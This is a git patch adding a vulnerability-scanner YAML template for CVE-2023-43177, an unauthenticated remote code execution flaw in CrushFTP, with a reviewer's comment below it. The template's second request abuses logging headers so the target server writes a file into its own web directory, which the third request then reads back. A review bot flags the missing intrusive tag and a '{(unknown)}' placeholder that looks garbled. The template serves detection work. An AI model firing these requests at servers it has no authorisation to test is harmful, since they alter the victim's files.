From 5e01220d71c3f5eb0fb1ca777e516d5755b79a52 Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Tue, 12 Dec 2023 14:43:40 +0530
Subject: [PATCH] Added CVE-2023-43177 (CrushFTP < 10.5.1 RCE) (#8802)

* Added CVE-2023-43177

* misc update
---
 http/cves/2023/CVE-2023-43177.yaml | 72 ++++++++++++++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-43177.yaml

diff --git a/http/cves/2023/CVE-2023-43177.yaml b/http/cves/2023/CVE-2023-43177.yaml
new file mode 100644
index 0000000000..2696f1e412
--- /dev/null
+++ b/http/cves/2023/CVE-2023-43177.yaml
@@ -0,0 +1,72 @@
+id: CVE-2023-43177
+
+info:
+  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
+    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
+    - https://blog.projectdiscovery.io/crushftp-rce/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-43177
+    cwe-id: CWE-913
+    epss-score: 0.00106
+    epss-percentile: 0.42673
+    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 3
+    vendor: crushftp
+    product: crushftp
+  tags: cve,cve2023,crushftp,unauth,rce
+
+flow: http(1) && http(2) && http(3)
+
+variables:
+  dirname: "{{randbase(5)}}"
+  filename: "{{randbase(5)}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/WebInterface"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains_all(to_lower(header), "currentauth", "crushauth")
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
+
+    headers:
+      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
+      as2-to: X
+      user_name: crushadmin{{dirname}}
+      user_log_path: "./WebInterface/{{dirname}}/"
+      user_log_file: "{(unknown)}"
+      Content-Type: application/x-www-form-urlencoded
+
+    body: |
+      post=body
+
+    matchers:
+      - type: regex
+        regex:
+          - "crushadmin"
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/WebInterface/{{dirname}}/{(unknown)}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, "crushadmin{{dirname}}")
+        condition: and
\ No newline at end of file
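Review bot: The second request makes the target write a directory and a file under its own web root (`user_log_path: "./WebInterface/{{dirname}}/"`, then fetched back by the third request), but the `tags` line carries no `intrusive` tag, so operators who exclude intrusive templates will still run it and the artifact is never removed. Suggest `tags: cve,cve2023,crushftp,unauth,rce,intrusive` and a sentence in `description` saying that a verification file is left in the server's WebInterface directory and has to be cleaned up by hand. Separately, `variables.filename` is declared but, as the hunk renders here, never referenced: `user_log_file` and the third request's path both show the literal `{(unknown)}`, which looks like a rendering artifact of a `{{filename}}` reference rather than the committed text — worth confirming against the file, since a literal value there would make `filename` dead and the third path non-random. The file also ends without a trailing newline.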